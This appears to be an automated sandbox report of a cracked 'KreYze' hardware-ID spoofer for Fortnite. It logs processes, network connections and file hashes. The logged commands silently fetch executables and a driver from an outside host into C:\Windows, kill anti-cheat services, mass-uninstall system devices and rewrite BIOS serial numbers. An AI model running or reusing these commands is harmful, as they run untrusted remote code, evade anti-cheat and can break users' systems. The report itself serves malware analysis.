curl https://kreyzespoofer.com/spoofperm/backgroundcleaner.bat -o C:\Windows\backgroundcleaner.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/devcon.exe -o C:\Windows\devcon.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/devcon.exe -o C:\Windows\devcon.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/DeviceCleanupCmd.exe -o C:\Windows\DeviceCleanupCmd.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/DeviceCleanupCmd.exe -o C:\Windows\DeviceCleanupCmd.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/DevManView.exe -o C:\Windows\DevManView.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/DevManView.exe -o C:\Windows\DevManView.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/DriveCleanup.exe -o C:\Windows\DriveCleanup.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/DriveCleanup.exe -o C:\Windows\DriveCleanup.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/gen.py -o C:\Windows\gen.py --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/gen.py -o C:\Windows\gen.py --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/kreyzecleaner.exe -o C:\Windows\kreyzecleaner.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/kreyzecleaner.exe -o C:\Windows\kreyzecleaner.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/python310._pth -o C:\Windows\python310._pth --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/python310._pth -o C:\Windows\python310._pth --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/segwindrv.cat -o C:\Windows\segwindrv.cat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/segwindrv.cat -o C:\Windows\segwindrv.cat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/segwindrvx64.sys -o C:\Windows\segwindrvx64.sys --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/segwindrvx64.sys -o C:\Windows\segwindrvx64.sys --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/serials.bat -o C:\Windows\serials.bat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/serials.bat -o C:\Windows\serials.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/sidchg64-3.0h.exe -o C:\Windows\sidchg64-3.0h.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/sidchg64-3.0h.exe -o C:\Windows\sidchg64-3.0h.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/Spoofer.bat -o C:\Windows\Spoofer.bat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/Spoofer.bat -o C:\Windows\Spoofer.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/Taskkill_clean.bat -o C:\Windows\Taskkill_clean.bat --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/Taskkill_clean.bat -o C:\Windows\Taskkill_clean.bat --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://kreyzespoofer.com/spoofperm/Volumeid64.exe -o C:\Windows\Volumeid64.exe --silent
C:\Windows\system32\curl.exe
curl https://kreyzespoofer.com/spoofperm/Volumeid64.exe -o C:\Windows\Volumeid64.exe --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Spoofer.bat
C:\Windows\system32\PING.EXE
ping www.google.com -n 1
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat_Setup.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicWebHelper.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im EasyAntiCheat.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im BEService_x64.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\sc.exe
sc stop BEService
C:\Windows\system32\sc.exe
sc stop EasyAntiCheat
C:\Windows\DevManView.exe
DevManView.exe /uninstall "SWD\MS*" /use_wildcard
C:\Windows\DeviceCleanupCmd.exe
DeviceCleanupCmd.exe * -s
C:\Windows\DriveCleanup.exe
DriveCleanup.exe
C:\Windows\DevManView.exe
DevManView.exe /uninstall "C:\"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "F:\"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "C:\"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Disk drive*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Disk"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "disk"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Disk&*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "USBSTOR*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Message: Session not found. Use latest code. You can only have app opened 1 at a time. && timeout /t 5"
C:\Windows\system32\cmd.exe
cmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Message: Session not found. Use latest code. You can only have app opened 1 at a time. && timeout /t 5"
C:\Windows\DevManView.exe
DevManView.exe /uninstall "STORAGE*" /use_wildcard
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Motherboard*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Volume*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Microsoft*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "System*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "ACPI\*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Remote*" /use_wildcard
C:\Windows\DevManView.exe
DevManView.exe /uninstall "Standard*" /use_wildcard
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SU AUTO
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BS 26668211451269713617
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CS 571515691440811153
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SS 1873230441108910170
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /PSN 11809176532753615083
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /IVN 13827125941701628060
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /IV 2277929547260231214
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SM 22211247742271711332
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SP 181978033855910978
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SV 36846202471789
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SS 276316460115349571
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SK 339531995107496116
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /SF 29464101622264014081
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BM 29598298991956429564
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BP 30240168152963512721
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BV 104936461482111803
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BT 11174958576732841
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /BLC 26172146532846127634
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CM 2242230139903416663
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CV 30962203593162710665
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CA 11494454275673643
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /CSK 13580279473054122745
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /PAT 1178850833108028233
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /PPN 81246415262719600
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 1 3164296263058229369
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 2 197381572457830161
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 3 271873502256226422
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 4 29347287513113828690
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 5 187442799188417954
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 6 24853098352123996
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 7 2474527190556532016
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 8 532614595985294
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 9 122472179711790328
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 10 1128141183676841
C:\Windows\AMIDEWINx64.EXE
AMIDEWINx64.EXE /OS 11 21962162611964613383
C:\Windows\system32\taskkill.exe
TASKKILL /F /IM WmiPrvSE.exe
C:\Windows\system32\taskkill.exe
TASKKILL /F /IM WmiPrvSE.exe
C:\Windows\system32\PING.EXE
PING localhost -n 15
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New folder\Spoofer.bat
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\devcon.exe
devcon rescan
C:\Windows\system32\PING.EXE
ping www.google.com -n 1
C:\Windows\system32\find.exe
find "="
C:\Windows\system32\net.exe
net stop winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop winmgmt /y
C:\Windows\system32\net.exe
net start winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start winmgmt /y
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\sc.exe
sc stop winmgmt
C:\Windows\system32\sc.exe
sc start winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://docs.google.com/document/d/e/2PACX-1vSCFR7ny51MTSLmgXcfG1T9bUNNovomqDA3Nar9rnvvvnQ46BT6T44NFL1XMDJNC329G4d3xA1BjDSw/pub
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc860646f8,0x7ffc86064708,0x7ffc86064718
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,12758778303679416948,17503584943512163765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.178.1:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | downloads.sourceforge.net | udp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 8.8.8.8:53 | netix.dl.sourceforge.net | udp |
| BG | 87.121.121.2:443 | netix.dl.sourceforge.net | tcp |
| US | 8.8.8.8:53 | 105.111.68.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.121.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.133:443 | login.microsoftonline.com | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:54397 | tcp | |
| N/A | 127.0.0.1:54399 | tcp | |
| N/A | 127.0.0.1:54402 | tcp | |
| N/A | 127.0.0.1:54404 | tcp | |
| N/A | 127.0.0.1:54407 | tcp | |
| N/A | 127.0.0.1:54409 | tcp | |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kreyzespoofer.com | udp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| US | 8.8.8.8:53 | 100.0.160.217.in-addr.arpa | udp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| DE | 217.160.0.100:443 | kreyzespoofer.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:54721 | tcp | |
| N/A | 127.0.0.1:54723 | tcp | |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 172.217.169.78:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lh7-us.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh7-us.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 216.58.204.67:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:61713 | tcp | |
| N/A | 127.0.0.1:61715 | tcp |
Files
\??\pipe\crashpad_4380_LZEPNBIWQVEOGMMI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\p\Paths\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 2a403b26ee322a9558c9e464ebe82e5a |
| SHA1 | 057f4ce6ce1192ae5125668c580eb30fa8db8a31 |
| SHA256 | 7b2f3de3f72c20982c34e51c61835796285a9894b0b04878683afe42026fb514 |
| SHA512 | 7d3675291abc56d0c4e2b46114dfa5bb4cdfe28bfe8b5591565c0534e5ca9fc88aad625289285221d78824ab4becc937cf0df9132a4b4830ba348063e5b8fbda |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 79fb77b005273d50989e9711eb473fd3 |
| SHA1 | d450e3b29a2ec9c07f4467f0f5c01c109242262f |
| SHA256 | 271ba1c8a432a95837538009d380488e65753be184bb6642d80dcb6f8c4a55b7 |
| SHA512 | 497dfd4344cdf5e148989a0906debe046a8fc2cf25e34b2493690ead00d0776b060afc2da6e1e9a0cba2f1f3da573adcce5629e838859080f31ca71085a922e4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e4feeaf29c8060b13682b7c0c2192116 |
| SHA1 | 6344c89b88c2010b8db685addf35194e9c4e75f9 |
| SHA256 | 853ca1371f0b619ee5183c471d1ca847b80d131c7bc64316101766cf6593e1d9 |
| SHA512 | 59927f2dfcd37c1094693c43987177565649ee33f12e6cd3c6f3dc766e1eb7ec6a91f0803353a1c05e40079d15bd9de705d837d88f7be41a2908af6640d9f1bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 85377b7a053563143c0299d43e524c49 |
| SHA1 | 02860802b68c6d9fb3caf60cd6a14c23ec2b087c |
| SHA256 | 683666bd8c49be8b0a5a33d680d23e4151b791aa37db7b83002114f6111cf2dd |
| SHA512 | a92b53586a0e0b18e00846843c62cff36d2058c22a591249e76d0eece1d9ff3ee288aa6a2ca026726499474df09bdd0a43dc7fd4eb19276d37fd68bb8a0e36ec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 3ab50e85039c9f54701e82133ec73f2e |
| SHA1 | 025cc9a7b82544368903ecfaa4c2f9cb451ddb2e |
| SHA256 | 62daa211f7ed81038cae1f64ae8243527faadfbab16cb027bc2f6951bb2abe97 |
| SHA512 | 36ec12e434f243027cc105a11998c7f06a0b2d609ddaf19bcbc56651e32c6d183cc5d54468f26e888bcd02f57967f32d0f34c597b51c1f170d098a98d352b08f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f4a7444ab61fda031f868ad229e79e99 |
| SHA1 | dc3e4e88fd6657e03abc958dd18df252d35639a8 |
| SHA256 | 130cc6a517a26ec2faa1447475c5aaa6328ddeb089886312f515b91754ba8b19 |
| SHA512 | 619a7124b5669ba727bcee6c2b05838d879032cba57a63535aea431789c9505c87aa71f1f0f6e1eab0cd5790bb71e68c9c9147d0dcafef2a69646ebbb7284424 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5d94c18d3b00c6f9175ebd7b98836e94 |
| SHA1 | 6c95cc5a235a615603dc85ef2bd48e52d3ef03cf |
| SHA256 | 6376d0e4f13773b1c4a0c09aaeb65d83f3ea21c68d5adde2844cefa5512dc091 |
| SHA512 | df31838ea8ce517da3cf52e2586730672d344cb8ebee983062d9e4d4e6d5d93ef4fa0d71de6ccf6c0e6e3dd43f1d783627b967ab4c29e2c425513e2c3d177937 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d00e52d1671272128425b2fc454872f7 |
| SHA1 | b363dece03c3ccb3fc0f3dad60bcb6d78a3d6d73 |
| SHA256 | ee6903cc4fd34661a3f8336120ab57f3305fd056e3c32185045db294dfe4b7d0 |
| SHA512 | 6c0cb79e4052e32afcec2c5e322750a9288ff38f68e20b9b354a9b24d5304505ccfc60afd99d553522b0f0dfc6b7019e8c88ada95d0d99c6bf33d5644e2a864e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe
| MD5 | 222ad60ec8d0d3942d010b3ba798b5d8 |
| SHA1 | adb890e146ad8c10a6a5bb19af5d195f12f504e3 |
| SHA256 | b0ec651a8bd118943631d68ca8bf949ae81a6389faeb82928b9ec9beafa99f90 |
| SHA512 | 35357f7680841f4879f48ec83d9a9c7def023b32ed9f61ea7d2b40038c876c39b80a894f0468444f73577fae2dbf089b5ca70587e99348eba9ddfa35beb25521 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\ucrtbase.dll
| MD5 | 0e0bac3d1dcc1833eae4e3e4cf83c4ef |
| SHA1 | 4189f4459c54e69c6d3155a82524bda7549a75a6 |
| SHA256 | 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae |
| SHA512 | a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\python311.dll
| MD5 | 87b5d21226d74f069b5ae8fb74743236 |
| SHA1 | 153651a542db095d0f9088a97351b90d02b307ac |
| SHA256 | 3cac88119657daef7f79844aeb9da79b45c1f3bb2ea3468b0d4ed26067852194 |
| SHA512 | 788bb26b3f4ce99a2b49eef2742972fe843bdd97d361a6e67237f29376648ea6f874f1f6ba6dd53c74ef51a29e650a02fb99dfc30b5badfa9d2e05491f81d7d6 |
C:\Users\Admin\AppData\Local\Temp\_MEI15962\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
